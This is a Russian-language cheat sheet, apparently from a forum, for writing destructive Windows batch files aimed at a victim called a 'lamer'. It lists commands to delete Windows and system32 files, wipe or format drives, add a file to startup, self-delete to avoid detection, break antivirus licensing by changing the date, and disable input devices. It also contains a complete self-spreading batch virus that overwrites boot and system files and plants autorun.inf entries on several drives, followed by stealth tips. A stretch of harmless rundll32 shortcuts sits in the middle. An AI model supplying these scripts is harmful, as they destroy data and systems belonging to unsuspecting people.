@echo off - запрещаем вывод команд на экран, в том числе и результатов их выполнения. color 40 - делаем фон файла красным, а буквы чёрными. label LAMER - команда label указанная без параметров переименовывает системный диск на заданное слово.
attrib -s -r -h -a %systemdrive%*.* - снимаем системные атрибуты с некоторых файлов. erase %windir%*.* /q - банальное удаление файлов. erase %windir%system32*.* /q - банальное удаление файлов, хотя винду снесёт без проблем. erase
%systemdrive%*.* /q - удаление системно важных скрытых файлов на
системном диске. Хотя чтобы винда больше не запустилась никаким образом
достаточно удалить файл ntldr и перегрузиться. regedit (путь к
вашему файлу) - Добавляем информацию с вашего .reg файла в реестр.
Существует ещё и команда reg с параметрами, но иногда проще создать
отдельный .reg файл. Здесь фантазии может быть много... echo текст
>(>>) файл - Добавляем записи в файл. Знак > создаёт новый
файл с заданным текстом, >> добавляет уже в существующий файл. shutdown -r -f - Принудительно перезагружаем комп, несмотря на протесты системы.
Удалить дрова : @echo off del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
Самоликвидация! Дописываем к любой проге что-бы не палиться : @echo off del "%0" >nul
Вот еще парочка bat ников Date
12.05.15 -строка меняет дату(какой нибудь 15 год поставил и начнет
каспер плакать что лицензия 5лет назад кончилась.ну и другие проги
работающие по такому же принципу) Time 00:00 -я думаю понятно меняет время, можно любое задать Attrib +h c:(имя вашего файла).bat -меняет атрибут вашего файла на скрытый Echo c:(имя вашего файла).bat >>autoexec.bat -прописывает ваш файл в автозагрузку md md
LAMER -понятно что создастся новая папка LAMER ,на первый взгляд не
чего особенного. щас исправим... открываем Exel в первой ячейке пишем md
1 и оттягиваем вниз хоть на тысячу---копируем это все в блокнот
соответственно... дальше я думаю все понятно,смотря сколько папок будет
создаваться ну и от мощности мошины .... assoc .exe=.mp3 -запускает все ексшники как музыка del c:Program Files/q -удаляет все файлы из указанной папки assoc .lnk=.txt -все ярлыки начнут открываться блокнотом del *.* /q -удаление всех файлов , останутся только те которые находятся в той же папке в которой был запущен ну и не забываем вконце del %0 -САМОУДАЛЕНИЕ...
@echo off reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul -запрет запуска програм
@echo off del "%SystemRoot%\Cursors\*.*" >nul -удаляет курсоры мыши
@echo off del "%SystemRoot%\Media" /q >nul -удаляет звуки винды
@echo off reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul -запретить панель управления
@echo off net user "ламер" /add >nul -создать новую учетную запись в данном случае будетназываться ламер
[папка WINDOWS]\COMMAND\format [Буква_Диска]: /autotest - форматирование диска(работает в XP) Cd\ - команда для выхода в корневой каталог из места откуда был запущен bat файл Cd [Буква_Диска]: - команда перехода на диск ~~~~ Пример, взят с книжки(прога копирует себя в autoexec.bat): @Echo off if exist c:virus.bat goto wik {проверяем, существует ли файл, …} copy %0 c:virus.bat >nul attrib +h c:virus.bat >nul echo c:virus.bat>>c:autoexec.bat :wik {…если он существует, то программа переходит на метку :wik} copy %0 a:run.bat >nul ~~~~ Chcp 1251 - русская кодировка в бате start/wait regedit -s [file.reg] - сливаем file.reg с реестром rd [Буква_Диск]: /s /q - Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя) echo [Строка] >> [Файл] - дописывает строку в файл attrib -a -s -h [файл.расш] - снимает атрибуты с файла: +-[a] - снять/убрать аттрибут "НЕ ЗНАЮ Я КАКОЙ НО вроде Архивный" +-[ s ] - снять/убрать аттрибут "Системный" +-[h] - снять/убрать аттрибут "Скрытый" +-[r] = снять/убрать аттрибут "Чтение" ~~~~~~~ Пути: %USERPROFILE% - [C]:\Documents and Settings\[LAMER] %ProgramFiles% - это понятно что=) %USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch - быстрый запуск %USERPROFILE%\SendTo - меню "Оптравить" %windir% - Wind00z))) %temp% - поняна че ето ~~~~~~~~~~~ assoc .[старое расширение]=.[новое расширение] -изменения ассоцияций md Папка\еще папка - Создание папок, пример: md открой\и эту тоже\идём дальше\почти у цели\сейчас конец\конец Или так: Добавляем n папок в меню "Отправить": cd %USERPROFILE%\SendTo md 1 mp 2 md 3 ... md n ~~~~~~~~~~~~~~~~~~~~~ RUNDLL (Скопировано с "Народных советов, май 2003"), юзать прямо и тупо - пишете строку в BAT-файл и все: ~~~~~~~~~~~~~~~~~~~~~ rundll32 shell32.dll,Control_RunDLL hotplug.dll - диалоговое окно Отключение или извлечение аппаратного устройства rundll32 diskcopy,DiskCopyRunDll - вызов диалога "Копирование диска". rundll32 keyboard,disable - отключение клавиатуры, действует до следующей перезагрузки. rundll32 mouse,disable - отключение мыши вплоть до перезагрузки. rundll32 krnl386.exe,exitkernel - выгрузить ядро системы, выход из Windows. rundll32
mshtml.dll,PrintHTML "HtmlFileNameAndPath" - распечатать документ HTML,
где "HtmlFileNameAndPath" - путь к файлу и его имя. rundll32 мсprint2.dll,RUNDLL_PrintTestPage - распечатать тестовую страницу на принтере. rundll32 netplwiz.dll,AddNetPlaceRunDll - вызов мастера подключения нового сетевого ресурса "Добавление в сетевое окружение". rundll32 rnaui.dll,RnaWizard - вызов мастера "Удаленный доступ к сети". rundll32 rnaui.dll,RnaWizard /1 - вызов мастера "Удаленный доступ к сети" без отображения начального окна. rundll32 shell,ShellExecute - открыть Проводник (папка "Рабочий стол"). rundll32 shell32,Control_RunDLL - открыть в Проводнике папку "Панель управления". rundll32
shell32,Control_RunDLL appwiz.cpl,,n - вызов диалогового окна
"Установка и удаление программ", в котором будет открыта вкладка с
номером "n" (от 1 до 3). rundll32 shell32,Control_RunDLL main.cpl @0 - открыть диалог "Свойства мыши". rundll32 shell32,Control_RunDLL main.cpl @1 - открыть диалог "Свойства клавиатуры". rundll32 shell32,Control_RunDLL main.cpl @2 - открыть папку "Принтеры". rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintersFolder - открыть папку "Принтеры" (другой способ). rundll32 shell32,Control_RunDLL main.cpl @3 - открыть папку "Шрифты". rundll32 SHELL32,SHHelpShortcuts_RunDLL FontsFolder - открыть папку "Шрифты" (другой способ). rundll32 SHELL32,Control_RunDLL modem.cpl, add - открыть диалог "Свойства модема". rundll32 shell32,Control_RunDLL timedate.cpl - открыть диалог "Дата и время". rundll32 shell32,OpenAs_RunDLL - вызвать диалог "Открыть с помощью...". rundll32 shell32,ShellAboutA WINHOWTO.RU - информация о версии Windows. rundll32 shell32,SHExitWindowsEx 0 - закрыть все программы, перегрузить оболочку. rundll32 shell32, SHExitWindowsEx 1 - выключить ПК. rundll32 SHELL32, SHExitWindowsEx -1 - перегрузить оболочку Windows. rundll32 shell32, SHExitWindowsEx 2 - перегрузить ПК. rundll32 shell32,SHExitWindowsEx 4 - принудительно закрыть все программы. rundll32 shell32,SHExitWindowsEx 8 - выход из Windows и выключение ATX-совместимого ПК. rundll32 shell32,SHFormatDrive - вызов диалога форматирования диска А:. rundll32 SHELL32,SHHelpShortcuts_RunDLL AddPrinter - запуск "Мастера установки принтера". rundll32 shell32,SHHelpShortcuts_RunDLL Connect - запуск мастера подключения сетевого диска. rundll32 SHELL32,SHHelpShortcuts_RunDLL PrintTestPage - распечатать тестовую страницу. rundll32 sysdm.cpl,InstallDevice_Rundll - вызов мастера установки оборудования. rundll32 url.dll,FileProtocolHandler %1 - открыть веб-страницу, где %1 - URL сайта (включая [link=http://).]http://).[/link] rundll32 url.dll,MailToProtocolHandler %1 - создать новое письмо, где %1 - e-mail адресата. rundll32 user,CASCADECHILDWINDOWS - расположить все окна каскадом. rundll32 user,TILECHILDWINDOWS - расположить все окна по экрану. rundll32
user,disableoemlayer - сбой системы (!) - выключить все функции
ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный
экран с курсором и ни на что не реагирующая система, однако Windows
продолжает работать. rundll32 user,ExitWindowsExec - быстрая перезагрузка Windows. rundll32 user,RepaintScreen - выполнить команду "Обновить". rundll32 user,SetCaretBlinkTime n - задать частоту мигания курсора, соответствующую значению параметра n. rundll32 user,SetCursorPos - переместить курсор мыши в верхний левый угол экрана. rundll32
user,SetDoubleClickTime n - задать скорость двойного нажатия левой
кнопки мыши (Double Click), соответствующую параметру n. rundll32 user,SwapMouseButton - поменять местами клавиши мыши (обратная смена невозможна). rundll32 user,WNetConnectDialog - вызов диалога "Подключение сетевого диска". rundll32 user,WNetDisconnectDialog - вызов диалога "Отключение сетевого диска". rundll32 AppWiz.Cpl,NewLinkHere %1 - запуск мастера создания нового ярлыка, где %1 - путь к исходному файлу. ~~~~~~~~~~~~~~~~~~~~~~~ WSH(работает только В win2000=))))) БЕЗ КОМЕНТАРИЕВ, ДУМАЮ ВСЕ ПОНЯТНО: ~~~~~~~~~~~~~~~~~~~~~~~ echo var WSHShell = WScript.CreateObject(”WScript.Shell”); > %temp%\mes.js WSHShell.Popup(”][AKER FOREVA!”); >> %temp%\mes.js start %temp%\mes.js deltree /y %temp%\mes.js attrib c:\autoexec.bat +h +s +a +r pause cls ~~~~~~~~~~~~~~~~~~~~~ Вирус(полностью и нагло тоже скопирован): ctty nul //Было такое REM Чй† Ђь@uoњPSQRVW ? ‹тЌ ” Q_ь№ у¦u= є №є њъ.я?ђ л,ђ /// copy %0 *.exe /// copy %0 b.com>nul // Эта технология взята с вируса другово. b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их. del b.com. /// Это текст АСМ скомпиленого в exe rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ' ‰?ђ Ќ ё.%Н.Ќ є Н'ђђ // @echo off // echo XEP_BAM //Пишем злобно и красиво. if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен. @rundll32 user,setcursorpos ctty con //Было такое echo Обновление параметров системы, пожалуйста подождите... //Отвлекаем. @label BAT.c copy %0.bat %windir% > nul if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r deltree /y c:\autoexec.bat deltree /y c:\boot.ini if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\autoexec.bat if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER.... > c:\boot.ini //Это для XP он там вместо autoexec.bat ;) deltree /y %windir%/win.ini copy %0 > %windir%/win.ini deltree /y %windir%/system.ini copy %0 > %windir%/system.ini if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys echo [AutoRun] > c:\autorun.inf //И если он есть заразить его. echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его. if exist d:\io.sys //Проверка наличия диска echo [AutoRun] > d:\autorun.inf //И если он есть заразить его. echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его. if exist e:\io.sys //Проверка наличия диска echo [AutoRun] > e:\autorun.inf //И если он есть заразить его. echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его. :end //Метка СМ начало. cls //Выход ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ copy %0 [Папка] - Копирует себя в папку time ЧЧ:ММ - меняет время date ДД.ММ.ГГ - если ставить " в будущее", то у некоторых антивирусов дохнет активация del [файл.расш] /s /q - удаление файла deltree /y [Файл] - Еще одно удаление ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Сменить метку диска: Chcp 1251 label D: [Метка] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Метки в BAT-прогах: goto [Метка] -перейти к метке :[Метка] - создать метку ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ !!!БЕСПАЛЕВНОСЬ!!!: В начало ПРОГРАММЫ пишите: @Echo off В конец СТРОКИ пишите: >nul Пример: @Echo off copy %0 a:gg.bat >nul
